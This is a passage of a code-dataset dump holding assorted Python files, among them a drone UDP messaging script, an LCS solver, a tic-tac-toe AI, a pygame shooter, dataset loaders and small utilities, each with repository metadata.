data['ask'])\n l_t = (data['time'] >= '09:30:00') & (data['time'] <= '15:00:00')\n l = l_t & (data['amountdiff'] <= data.loc[l_t, 'amountdiff'].quantile(0.5))\n res['Speard'] = data.loc[l, 'spread'].mean()\n res['AmountMean'] = res['amount'] / data['总成交笔数'].iloc[-1]\n price_dict = {'1h': '10:30:00', '2h': '11:30:00', '3h': '14:00:00', '4h': '15:00:00'}\n for key, value in price_dict.items():\n l = data['time'] <= value\n if sum(l) > 0:\n res[key + 'Price'] = data.loc[l, '最新价'].iloc[-1]\n\n vwap_dict = {'0min': '09:29:50', '1min': '09:31:00', '3min': '09:33:00', '5min': '09:35:00',\n '10min': '09:40:00',\n '30min': '10:00:00', '60min': '10:30:00', '90min': '11:00:00', '120min': '11:30:00',\n '150min': '13:30:00', '180min': '14:00:00', '210min': '14:30:00', '240min': '15:00:00'}\n for key, value in vwap_dict.items():\n l = data['time'] <= value\n if sum(l) > 0:\n amount = data.loc[l, '总金额'].iloc[-1]\n volume = data.loc[l, '总量'].iloc[-1]\n res[key + 'Amount'] = amount\n res[key + 'Volume'] = volume\n return res\n","sub_path":"HFDMidDataCal/MidData1/warehouse/SyntheticDepthMid1_worker/depthVwap_worker.py","file_name":"depthVwap_worker.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"97966137","text":"#! 
/usr/bin/python3\n\nimport collections\nimport rospy\nimport socket\n\nfrom mavros_msgs.msg import Mavlink\nfrom std_msgs.msg import Bool\n\nsystem_id = 0\n\ndef mavlink_cb(system):\n system_id = system.sysid\n\ndef end_mission_cb(end_mission):\n if (system_id == 0):\n pass\n else:\n if (system_id == 17):\n drones_list = ['18', '20']\n elif (system_id == 18):\n drones_list = ['17', '20']\n elif (system_id == 20):\n drones_list = ['17', '18']\n UdpAddress = collections.namedtuple('UdpAddress', 'ip port')\n if end_mission.data == True:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(('0.0.0.0', 5000))\n for drone in drones_list:\n rospy.loginfo(\"Telling Drone \" + drone + \" to end mission!\")\n s.sendto('END_MISSION'.encode('utf-8'), UdpAddress(ip='192.168.1.1'+drone, port=5000))\n\ndef arm_group2_cb(arm_group2):\n drones_list = ['01', '03', '05', '08']\n UdpAddress = collections.namedtuple('UdpAddress', 'ip port')\n if arm_group2.data == True:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.bind(('0.0.0.0', 5000))\n while True:\n for drone in drones_list:\n s.sendto('TAKEOFF'.encode('utf-8'), UdpAddress(ip='192.168.1.1'+drone, port=5000))\n\ndef socket_listen(end_mission_pub):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.settimeout(0.05)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(('0.0.0.0', 5000))\n msg = s.recv(1024)\n if msg.decode(\"utf-8\") == \"END_MISSION\":\n rospy.loginfo(\"Another drone tells me to end mission!\")\n end_mission_pub.publish(True)\n else:\n pass\n except:\n pass\n\ndef comms_main():\n end_mission_pub = rospy.Publisher('end_mission', Bool, queue_size=1)\n rospy.init_node('batman_demo_group1_comms')\n rospy.Subscriber(\"mavlink/from\", Mavlink, mavlink_cb)\n rospy.Subscriber(\"end_mission\", Bool, end_mission_cb)\n rospy.Subscriber(\"arm_group2\", Bool, arm_group2_cb)\n rate = rospy.Rate(10)\n\n while not rospy.is_shutdown():\n socket_listen(end_mission_pub)\n rate.sleep()\n\nif __name__=='__main__':\n comms_main()\n","sub_path":"communications/scripts/batman_demo_group1_comms.py","file_name":"batman_demo_group1_comms.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381455705","text":"import os\nfrom sqlalchemy.inspection import inspect\n\nfrom sickkidsproj import app, db\nfrom sickkidsproj.database.models import ExonReadsMapping, GeneReadsMapping\nfrom sickkidsproj.utils.check import isEnsemblId\n\ndef get_exonexpr_storepath(ensembl_id):\n \"\"\" Quries ExonReadsMapping and returns \n corersponding storepath for ggiven ensemblId\n\n @param str ensemblId\n @rType str storepath: under exon_expr/\n return None if not found\n \"\"\"\n mapping = ExonReadsMapping.query \\\n .filter_by(ensembl_id = ensembl_id) \\\n .first()\n\n if mapping:\n return os.path.realpath(\n os.path.join(app.config['DATA_RESOURCES_DIR'], \n mapping.store_path))\n\n\ndef get_geneexpr_storepath(ensembl_id):\n \"\"\" Quries GeneReadsMapping and returns \n corersponding storepath for ggiven ensemblId\n\n @param str ensemblId\n @rType str storepath: under gene_expr/\n return None if not found\n \"\"\"\n mapping = GeneReadsMapping.query \\\n .filter_by(ensembl_id = ensembl_id) \\\n .first()\n\n if mapping:\n return os.path.realpath(\n os.path.join(app.config['DATA_RESOURCES_DIR'], \n mapping.store_path))\n\n\ndef get_all_exonreadsmapping_keys():\n \"\"\" Queries 
ExonReadsMapping and returns a list of keys\n\n @rType: [ ..., int ] \n \"\"\"\n query = db.session.query(GeneReadsMapping.ensembl_id.distinct())\n\n ensembl_ids = []\n for l in query.all():\n if len(l) == 1 and isEnsemblId(l[0]):\n ensembl_ids.append(l[0])\n return ensembl_ids\n\n\n\n\n\n","sub_path":"sickkidsproj/database/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"305201772","text":"from .views import *\nfrom django.test import TestCase\nfrom django.db import models\nfrom django.db.models import get_app\nfrom datetime import date\n\nclass SimpleTest(TestCase):\n def test_objects_creation(self):\n app = get_app('main')\n mds = models.get_models(app)\n\n for model in mds:\n model = model()\n for field in model._meta.fields:\n if field.__class__ == models.CharField:\n setattr(model,field.name,'Test')\n elif field.__class__ == models.IntegerField:\n setattr(model,field.name,1)\n elif field.__class__ == models.DateField:\n setattr(model,field.name,date.today())\n model.save()\n","sub_path":"main/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"537659903","text":"\"\"\"\n\tLongest common subsequence\n\tO(n m) time, O(n m) space\n\"\"\"\nimport sys\n\ndef lcsseq(a, b):\n\tn, m = len(a), len(b)\n\topt = [ (m+1)*[0] for i in range(0,n+1) ]\n\tsol = [ (m+1)*[None] for i in range(0,n+1) ]\n\tfor i in range(0,n+1): sol[i][0] = 'R'\n\tfor j in range(0,m+1): sol[0][j] = 'C'\n\tfor i in range(1,n+1):\n\t\tfor j in range(1,m+1):\n\t\t\tif a[i-1] == b[j-1]:\n\t\t\t\topt[i][j] = opt[i-1][j-1] + 1\n\t\t\telse:\n\t\t\t\topt[i][j] = max( opt[i-1][j], opt[i][j-1] )\n\t\t\tif opt[i][j] == opt[i-1][j]:\n\t\t\t\tsol[i][j] = 'R' # skip a symbol from a (skip a row)\n\t\t\telif opt[i][j] == opt[i][j-1]:\n\t\t\t\tsol[i][j] = 'C' # skip a symbol from b (skip a column)\n\t\t\telse:\n\t\t\t\tsol[i][j] = 'M' # match\n\tlength = opt[n][m]\n\t# Trace back the transcript\n\ttranscript = []\n\twhile n > 0 or m > 0: \n\t\ttranscript.append(sol[n][m])\n\t\tif sol[n][m] == 'R': n -= 1\n\t\telif sol[n][m] == 'C': m -= 1\n\t\telse:\n\t\t\tn -= 1\n\t\t\tm -= 1\n\treturn length, transcript[::-1]\n\ndef some_lcsseq(a, b): \n\ti, j = 0, 0\n\t_, T = lcsseq(a, b)\n\tc = []\n\tfor t in T:\n\t\tif t == 'R': i += 1\n\t\telif t == 'C': j += 1\n\t\telse: \n\t\t\tc.append(a[i])\n\t\t\ti += 1\n\t\t\tj += 1\n\treturn ''.join(c)\n\ndef main():\n\tfor line in sys.stdin:\n\t\ta, b = line.strip().split()\n\t\tprint(some_lcsseq(a, b))\n\nif __name__ == \"__main__\": main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"LCSSEQ.py","file_name":"LCSSEQ.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154051042","text":"#!/usr/bin/python\n\nfrom random import choice\n\nfrom Board import Board\nfrom Evaluation import Evaluation\n\nclass AI:\n def __init__(self, player, board):\n player = 'X' if player not in ['X', 'O'] else player\n self.player = player\n self.otherPlayer = 'O' if player == 'X' else 'X'\n self.board = board\n\n def __generateBoards(self):\n return {option:Board(self.board.fetch(), self.board.getPlayer()).move(option) for option in self.board.validPositions()}\n\n def __isFirstMove(self):\n if self.board.isEmpty():\n return True\n return False\n\n # A corner 
or the center is the best starting move\n def __selectFirstMove(self):\n return choice([1, 3, 5, 7, 9])\n \n def __isSecondMove(self):\n if len(self.board.validPositions()) == 8:\n return True\n return False\n\n # If the opponent has taken the center, pick a corner,\n # If the opponent has taken a corner, take the center\n # otherwise pick a corner or the center\n def __selectSecondMove(self):\n validMoves = self.board.validPositions()\n if 5 not in validMoves:\n return choice([1, 3, 7, 9])\n if len([pos for pos in [1, 3, 7, 9] if pos not in validMoves]) != 0:\n return 5\n return choice([1, 3, 5, 7, 9])\n \n def __findWinner(self, boards):\n for (option, board) in boards.items():\n e = Evaluation(board)\n if e.winner() == self.player:\n return option\n return None\n\n def __mustBlock(self):\n for move in self.board.validPositions():\n test = Board(self.board.fetch(), self.otherPlayer).move(move)\n evaluation = Evaluation(test)\n if evaluation.winner() == self.otherPlayer:\n return move\n return None\n\n def __wouldWin(self, board):\n for move in board.validPositions():\n test = Board(board.fetch(), self.player).move(move)\n evaluation = Evaluation(test)\n if evaluation.winner() == self.player:\n return True\n return False\n\n def __countLosingMoves(self, board):\n count = 0\n for move in board.validPositions():\n test = Board(board.fetch(), self.otherPlayer).move(move)\n evaluation = Evaluation(test)\n if evaluation.winner() == self.otherPlayer:\n count = count + 1\n return count\n\n def __countBlocks(self, board):\n maxCount = 0\n for move in board.validPositions():\n test = Board(board.fetch(), self.otherPlayer).move(move)\n # if this move would allow a win, then there are no must blocks\n count = 0\n if not self.__wouldWin(test):\n count = self.__countLosingMoves(test)\n maxCount = count if count > maxCount else maxCount\n return maxCount\n\n def __multiBlockMoves(self, boards):\n multiBlockMoves = []\n for (move, board) in boards.items():\n for otherMove in board.validPositions():\n test = Board(board.fetch(), self.otherPlayer).move(move)\n if self.__countBlocks(test) > 1:\n multiBlockMoves = multiBlockMoves + [move]\n break\n return multiBlockMoves\n\n def __noMultiBlockMoves(self, boards):\n multiBlockMoves = self.__multiBlockMoves(boards)\n return [move for move in boards.keys() if move not in multiBlockMoves]\n \n def __selectBestMove(self):\n if self.__isFirstMove():\n return self.__selectFirstMove()\n if self.__isSecondMove():\n return self.__selectSecondMove()\n boards = self.__generateBoards()\n win = self.__findWinner(boards)\n if win != None:\n return win\n mustBlock = self.__mustBlock()\n if mustBlock != None:\n return mustBlock\n noMultiBlockMoves = self.__noMultiBlockMoves(boards)\n if noMultiBlockMoves != []:\n return choice(noMultiBlockMoves)\n # somehow, all moves are multiblock moves, and this fails\n # this should be impossible to reach\n return choice(self.board.validPositions()) \n \n def makeMove(self):\n self.board.move(self.__selectBestMove())\n","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179843675","text":"# coding: utf-8\n\nimport string\nimport numpy as np\nimport time\n\n\nclass EightDigits:\n\n def __init__(self):\n self._history = []\n while True:\n self._puzzle = np.random.permutation(9).reshape((3, 3))\n self._zero = np.argwhere(self._puzzle==0).flatten()\n if self.solution_exist(\\\n np.delete(self._puzzle, 
self._zero[0]*3 + self._zero[1], None)):\n return\n\n @classmethod\n def solution_exist(self, puzzle):\n reverse = 0\n for idx, val in enumerate(puzzle):\n for prev in puzzle[:idx]:\n if prev > val:\n reverse += 1\n return not (reverse & 1)\n\n @property\n def history(self):\n return self._history\n\n def move_back(self, deep=None):\n deep = deep or len(self._history)\n while deep > 0 and len(self._history) > 0:\n step = self._history.pop()\n self.move(-step, record=False)\n deep -= 1\n return self\n\n def move(self, step=None, record=True):\n puzzle = self._puzzle\n zero = self._zero\n step = np.array(step)\n dest = zero + step\n if dest[0] not in [0, 1, 2] or dest[1] not in [0, 1, 2]:\n return self\n puzzle[zero[0], zero[1]] = puzzle[dest[0], dest[1]]\n puzzle[dest[0], dest[1]] = '0'\n self._zero = dest\n self._puzzle = puzzle\n if record:\n self._history.append(step)\n return self\n\n def distance(self):\n ret = 0\n for row in range(3):\n for col in range(3):\n v = (self._puzzle[row, col] + 8) % 9\n ret += (row - v / 3)**2 + (col - v % 3)**2\n return ret\n\n def win(self):\n return self.distance() == 0\n\n def __str__(self):\n return '\\n'.join([' '.join([str(cell) for cell in line]) \\\n for line in self._puzzle.tolist()])\n\n","sub_path":"puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"437761521","text":"import turtle as t\r\nimport time as ti\r\n\r\n\r\ndef circle(a):\r\n while a<1000:\r\n t.speed(50)\r\n t.pencolor(\"red\")\r\n \r\n t.circle(a)\r\n t.right(25)\r\n a=a+5\r\n circle(a)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nt.bgcolor(\"black\")\r\nt.speed(\"fast\")\r\nt.pensize(4)\r\ncircle(50)\r\n\r\n # t.circle(5)\r\nti.sleep(2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nt.exitonclick()","sub_path":"KaleidoSpiral.py","file_name":"KaleidoSpiral.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2792851","text":"# -- coding: utf-8 --\nfrom __future__ import unicode_literals\nimport os\nfrom fpdf import FPDF\nimport logging\nimport csv\n\n\n__author__ = 'PyARK'\n\n# import psutil\n# print(psutil.sensors_battery())\n# print(psutil.sensors_fans())\n# print(psutil.sensors_temperatures())\n\n\nflag_first_point = 'stop'\nsize = 0\nlog_file = None\n\n\ndef config_log():\n global log_file\n\n if 'File' not in os.listdir('c:\\\\Users\\Public'):\n os.mkdir('c:\\\\Users\\Public\\File')\n # print('create DIR - FILE')\n\n log_file = logging.getLogger(\"LIB_FILE\")\n log_file.setLevel(logging.DEBUG)\n\n try:\n format_log = logging.FileHandler(\"c:\\\\Users\\Public\\File\\sample.log\")\n except:\n format_log = logging.FileHandler(\"c:\\\\Users\\Public\\sample.log\")\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n format_log.setFormatter(formatter)\n\n log_file.addHandler(format_log)\n\n\ndef write_in_file(data_str, file_name):\n\n file_measure = open(file_name, 'a')\n file_measure.write(data_str + '\\n')\n file_measure.close()\n\n\ndef write_pdf(data_str):\n pdf = FPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n pdf.set_font(\"Arial\", size=12)\n pdf.cell(200, 10, txt=\"Welcome to Python!\", ln=1, align=\"C\")\n pdf.cell(200, 10, txt=str(data_str), ln=1, align=\"C\")\n pdf.output(\"D:\\\\simple_demo.pdf\")\n # print('write')\n\n\ndef csv_dict_writer(path, 
fieldnames, data):\n \"\"\"\n Writes a CSV file using DictWriter\n \"\"\"\n with open(path, \"w\", newline='') as out_file:\n writer = csv.DictWriter(out_file, delimiter=',', fieldnames=fieldnames)\n writer.writeheader()\n for row in data:\n writer.writerow(row)\n\n\ndef csv_dict_reader(file_obj):\n \"\"\"\n Read a CSV file using csv.DictReader\n \"\"\"\n reader = csv.DictReader(file_obj, delimiter=',')\n for line in reader:\n print(line)\n print(line[\"first_name\"]),\n print(line[\"last_name\"])\n\n\n\n\n\n","sub_path":"Analyzer_parts/lib_file.py","file_name":"lib_file.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65688850","text":"import os\nimport cv2\nimport numpy as np\nimport pickle\n\nIMAGE_WIDTH = 352\nIMAGE_HEIGHT = 1216\n\n\nclass Dataset:\n\n def __init__(self):\n self._index_in_epoch = 0\n self._epochs_completed = 0\n self.train_image = []\n self.train_label = []\n self.test_image = []\n self.test_label = []\n self.valid_image = []\n self.valid_label = []\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/image/train/\"))\n l.sort()\n for name in l:\n img = np.asarray(cv2.imread(os.path.join(os.path.dirname(__file__), \"./data/image/train/\" + name)),\n \"float32\")\n self.train_image.append(img)\n\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/label/train/\"))\n l.sort()\n for name in l:\n label = pickle.load(open(os.path.join(os.path.dirname(__file__), \"./data/label/train/\" + name), \"rb\"),\n encoding='bytes')\n label = label.reshape(IMAGE_WIDTH, IMAGE_HEIGHT, 1)\n self.train_label.append(label)\n\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/image/test/\"))\n l.sort()\n for name in l:\n img = np.asarray(cv2.imread(os.path.join(os.path.dirname(__file__), \"./data/image/test/\" + name)),\n \"float32\")\n self.test_image.append(img)\n\n l = os.listdir(os.path.join(os.path.dirname(__file__), \"./data/label/test/\"))\n l.sort()\n for name in l:\n label = pickle.load(open(os.path.join(os.path.dirname(__file__), \"./data/label/test/\" + name), \"rb\"),\n encoding='bytes')\n label = label.reshape(IMAGE_WIDTH, IMAGE_HEIGHT, 1)\n self.test_label.append(label)\n\n self.test_image = np.asarray(self.test_image[:])\n self.test_label = np.asarray(self.test_label[:])\n self.valid_image = np.asarray(self.train_image[199:])\n self.valid_label = np.asarray(self.train_label[199:])\n self.train_image = np.asarray(self.train_image[:199])\n self.train_label = np.asarray(self.train_label[:199])\n self._num_examples = self.train_image.shape[0]\n\n def next_batch(self, batch_size, shuffle=True):\n start = self._index_in_epoch\n if start == 0 and self._epochs_completed == 0:\n idx = np.arange(0, self._num_examples) # get all possible indexes\n np.random.shuffle(idx) # shuffle index\n self.train_image = self.train_image[idx]\n self.train_label = self.train_label[idx]\n\n # go to the next batch\n if start + batch_size > self._num_examples:\n self._epochs_completed += 1\n self._index_in_epoch = 0\n start = 0\n self._index_in_epoch += batch_size\n end = self._index_in_epoch\n return self.train_image[start:end], self.train_label[start:end]\n\n\nif __name__ == '__main__':\n dataset = Dataset()\n print(dataset.valid_image.shape)\n","sub_path":"HW6_FCN-32/input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
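A minimal, self-contained sketch of the csv.DictWriter/DictReader round-trip that the lib_file.py record above wraps; the file name, field names and sample rows here are illustrative placeholders, not values from the original project:

import csv

fieldnames = ["first_name", "last_name"]
rows = [{"first_name": "Ada", "last_name": "Lovelace"},
        {"first_name": "Alan", "last_name": "Turing"}]

# Write: header line first, then one CSV line per dict (as csv_dict_writer does above)
with open("people.csv", "w", newline="") as out_file:
    writer = csv.DictWriter(out_file, delimiter=",", fieldnames=fieldnames)
    writer.writeheader()
    for row in rows:
        writer.writerow(row)

# Read back: DictReader yields one dict per data row, keyed by the header line
with open("people.csv") as in_file:
    for line in csv.DictReader(in_file, delimiter=","):
        print(line["first_name"], line["last_name"])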
+{"seq_id":"89393457","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 17 16:32:23 2019\r\n@author: admin\r\n\r\nPriya Bannur: Simple game using Pygame\r\n\"\"\"\r\n\r\nimport pygame\r\npygame.init()\r\n #coordinate of object is at its top left point\r\n #initializing\r\n\r\nscreenw=800\r\nscreenh=500\r\nwin = pygame.display.set_mode((screenw,screenh)) #window width=600, height=300\r\npygame.display.set_caption(\"My-Game\")\r\nclock = pygame.time.Clock()\r\n\r\nwalkRight = [pygame.image.load('R1.png'), pygame.image.load('R2.png'), pygame.image.load('R3.png'), pygame.image.load('R4.png'), pygame.image.load('R5.png'), pygame.image.load('R6.png'), pygame.image.load('R7.png'), pygame.image.load('R8.png'), pygame.image.load('R9.png')]\r\nwalkLeft = [pygame.image.load('L1.png'), pygame.image.load('L2.png'), pygame.image.load('L3.png'), pygame.image.load('L4.png'), pygame.image.load('L5.png'), pygame.image.load('L6.png'), pygame.image.load('L7.png'), pygame.image.load('L8.png'), pygame.image.load('L9.png')]\r\nbg = pygame.image.load('bg.png')\r\nchar = pygame.image.load('standing.png')\r\n\r\nclock = pygame.time.Clock()\r\n#bulletSound = pygame.mixer.Sound(\"bullet.wav\")\r\n#hitSound = pygame.mixer.Sound(\"hit.wav\")\r\nmusic = pygame.mixer.music.load(\"music.mp3\")\r\npygame.mixer.music.play(-1) # -1 will ensure the song keeps playing\r\nscore = 0 \r\n\r\nclass player(object):\r\n def __init__(self,x,y,width,height): #attributes of player\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.vel = 5\r\n self.isJump = False\r\n self.left = False\r\n self.right = True\r\n self.walkCount = 0\r\n self.jumpCount = 10\r\n self.standing = True\r\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\r\n #the elements in the hitbox are (top left x, top left y, width, height)\r\n\r\n def draw(self, win):\r\n #9 images for our walking animation, to show the same image for 3 frames\r\n #number 27 as an upper bound for walkCount because 27 / 3 = 9. 
\r\n #9 images shown 3 times each animation.\r\n if self.walkCount + 1 >= 27:\r\n self.walkCount = 0\r\n \r\n if not(self.standing):\r\n if self.left: #facing left\r\n win.blit(walkLeft[self.walkCount//3], (self.x,self.y))\r\n self.walkCount += 1\r\n elif self.right: #facing right\r\n win.blit(walkRight[self.walkCount//3], (self.x,self.y))\r\n self.walkCount +=1\r\n else: #standing still facing either side\r\n if self.right:\r\n win.blit(walkRight[0], (self.x, self.y))\r\n else:\r\n win.blit(walkLeft[0], (self.x, self.y))\r\n \r\n #draw hit box around the player\r\n self.hitbox = (self.x + 17, self.y + 11, 29, 52)\r\n #pygame.draw.rect(win, (255,0,0), self.hitbox,2) \r\n \r\n def hit(self):\r\n self.isJump = False\r\n self.jumpCount = 10 \r\n self.x = 60 #resetting the player position\r\n self.y = 380\r\n self.walkCount = 0\r\n font1 = pygame.font.SysFont('comicsans', 100)\r\n text = font1.render('-5', 1, (255,0,0))\r\n win.blit(text, (400,20))\r\n pygame.display.update()\r\n i = 0\r\n while i < 300:\r\n pygame.time.delay(10)\r\n i += 1\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n i = 301\r\n pygame.quit()\r\n #msg when hit for a certain period of time\r\n\r\nclass projectile(object): #bullet class\r\n def __init__(self,x,y,radius,color,facing):\r\n self.x = x\r\n self.y = y\r\n self.radius = radius\r\n self.color = color\r\n self.facing = facing #left or right\r\n self.vel = 8 * facing\r\n \r\n def draw(self,win):\r\n pygame.draw.circle(win, self.color, (self.x,self.y), self.radius)\r\n\r\n\r\nclass enemy(object):\r\n walkRight = [pygame.image.load('R1E.png'), pygame.image.load('R2E.png'), pygame.image.load('R3E.png'), pygame.image.load('R4E.png'), pygame.image.load('R5E.png'), pygame.image.load('R6E.png'), pygame.image.load('R7E.png'), pygame.image.load('R8E.png'), pygame.image.load('R9E.png'), pygame.image.load('R10E.png'), pygame.image.load('R11E.png')]\r\n walkLeft = [pygame.image.load('L1E.png'), pygame.image.load('L2E.png'), pygame.image.load('L3E.png'), pygame.image.load('L4E.png'), pygame.image.load('L5E.png'), pygame.image.load('L6E.png'), pygame.image.load('L7E.png'), pygame.image.load('L8E.png'), pygame.image.load('L9E.png'), pygame.image.load('L10E.png'), pygame.image.load('L11E.png')]\r\n \r\n def __init__(self, x, y, width, height, end):\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.path = [x, end] #where the enemy starts and finishes its path\r\n self.walkCount = 0\r\n self.vel = 3\r\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\r\n self.health = 10 \r\n self.visible = True\r\n \r\n def draw(self, win):\r\n self.move()\r\n if self.visible:\r\n if self.walkCount + 1 >= 33: #11 images for each animtion, upper bound = 33. 
\r\n self.walkCount = 0\r\n \r\n if self.vel > 0: #moving to the right\r\n win.blit(self.walkRight[self.walkCount//3], (self.x,self.y))\r\n self.walkCount += 1\r\n else: #else Left\r\n win.blit(self.walkLeft[self.walkCount//3], (self.x,self.y))\r\n self.walkCount += 1\r\n \r\n pygame.draw.rect(win, (255,0,0), (self.hitbox[0], self.hitbox[1] - 20, 50, 10))\r\n pygame.draw.rect(win, (0,128,0), (self.hitbox[0], self.hitbox[1] - 20, 50 - (5 * (10 - self.health)), 10)) \r\n #draw hit box around the enemy\r\n self.hitbox = (self.x + 17, self.y + 2, 31, 57)\r\n #pygame.draw.rect(win, (255,0,0), self.hitbox,2) \r\n \r\n def move(self):\r\n if self.vel > 0: #moving right\r\n if self.x < self.path[1] + self.vel: #if not right end of path\r\n self.x += self.vel\r\n else: #if end reached\r\n self.vel = self.vel * -1\r\n self.x += self.vel\r\n self.walkCount = 0\r\n else: #moving left\r\n if self.x > self.path[0] - self.vel: #if not left end of path\r\n self.x += self.vel\r\n else: #if end reached\r\n self.vel = self.vel * -1\r\n self.x += self.vel\r\n self.walkCount = 0 \r\n \r\n def hit(self): #when enemy is hit\r\n #hitSound.play()\r\n if self.health > 0:\r\n self.health -= 1\r\n else:\r\n self.visible = False\r\n print('hit') \r\n\r\ndef redrawGameWindow():\r\n win.blit(bg, (0,0))\r\n text = font.render(\"Score: \" + str(score), 1, (0,0,0)) \r\n #text, anti-aliasing, color\r\n win.blit(text, (680, 10))\r\n man.draw(win)\r\n goblin.draw(win)\r\n for bullet in bullets:\r\n bullet.draw(win)\r\n pygame.display.update()\r\n \r\n################################################################################################# \r\n #mainloop\r\nfont = pygame.font.SysFont(\"comicsans\", 30, True)\r\n #Bold set True\r\nman = player(10, 380, 64, 64) #creating instances\r\ngoblin = enemy(100, 380, 64, 64, 600)\r\nshootLoop=0\r\nrun = True\r\nbullets = [] \r\nwhile run:\r\n clock.tick(27)\r\n \r\n if goblin.visible == True:\r\n if man.hitbox[1] < goblin.hitbox[1] + goblin.hitbox[3] and man.hitbox[1] + man.hitbox[3] > goblin.hitbox[1]:\r\n if man.hitbox[0] + man.hitbox[2] > goblin.hitbox[0] and man.hitbox[0] < goblin.hitbox[0] + goblin.hitbox[2]:\r\n man.hit()\r\n score -= 5 #reducing score if enemy hits player\r\n\r\n if shootLoop > 0:\r\n shootLoop += 1\r\n if shootLoop > 3:\r\n shootLoop = 0\r\n \r\n for event in pygame.event.get(): #loop through key actions\r\n if event.type == pygame.QUIT: #game exit\r\n run = False\r\n \r\n for bullet in bullets: #checks x & y coords\r\n if bullet.y - bullet.radius < goblin.hitbox[1] + goblin.hitbox[3] and bullet.y + bullet.radius > goblin.hitbox[1]:\r\n if bullet.x + bullet.radius > goblin.hitbox[0] and bullet.x - bullet.radius < goblin.hitbox[0] + goblin.hitbox[2]:\r\n if goblin.visible == True:\r\n goblin.hit() #calls enemy hit method\r\n score += 1\r\n bullets.pop(bullets.index(bullet))\r\n #remove bullet from bullet list\r\n \r\n if bullet.x < screenw and bullet.x > 0:\r\n bullet.x += bullet.vel #moves the bullet by its vel\r\n else:\r\n bullets.pop(bullets.index(bullet)) #remove the bullet if it is off the screen\r\n\r\n keys = pygame.key.get_pressed() #returns a dictonary where 1= key pressed and 0= key not pressed.\r\n\r\n if keys[pygame.K_SPACE] and shootLoop==0: #code to shoot bullets\r\n #bulletSound.play()\r\n if man.left:\r\n facing = -1\r\n else:\r\n facing = 1\r\n \r\n if len(bullets) < 5: #make sure we cannot exceed 5 bullets on the screen at once\r\n bullets.append(projectile(round(man.x+man.width//2), round(man.y + man.height//2), 6, (0,0,0), facing)) 
\r\n #create a bullet starting at the middle of the character\r\n shootLoop = 1\r\n \r\n \r\n if keys[pygame.K_LEFT] and man.x > man.vel:\r\n man.x -= man.vel\r\n man.left = True\r\n man.right = False\r\n man.standing = False\r\n elif keys[pygame.K_RIGHT] and man.x < screenw - man.width - man.vel:\r\n man.x += man.vel\r\n man.right = True\r\n man.left = False\r\n man.standing = False\r\n else:\r\n man.standing = True\r\n man.walkCount = 0\r\n \r\n if not(man.isJump):\r\n if keys[pygame.K_UP]: \r\n man.isJump = True\r\n man.right = True\r\n man.left = False\r\n man.walkCount = 0\r\n else: \r\n if man.jumpCount >= -10: #code to jump\r\n neg = 1\r\n if man.jumpCount < 0:\r\n neg = -1\r\n man.y -= (man.jumpCount ** 2) * 0.5 * neg\r\n man.jumpCount -= 1\r\n else:\r\n man.isJump = False\r\n man.jumpCount = 10\r\n \r\n redrawGameWindow()\r\n\r\npygame.quit() #game closed when while loop exited","sub_path":"mygame.py","file_name":"mygame.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138235034","text":"# this is my second program\n# This program will get input on the users.\n# This program will also convert their height\n\n# get the user name\nname = raw_input('please input your name ')\nfull_name = str(name)\nprint ('Hello ' + full_name)\n\n# get the user height\nheight = raw_input('please input your height in cm: ')\nheight = int(height) * 0.01\n#print('your height in m is: ' + str(height) + ' m')\nprint('your height in m is: ' + str(\"{:.2f}\".format(height)) + ' m')\n#{:.2f}\".format())\n\n\n# convert the user height\nheight_in_feet 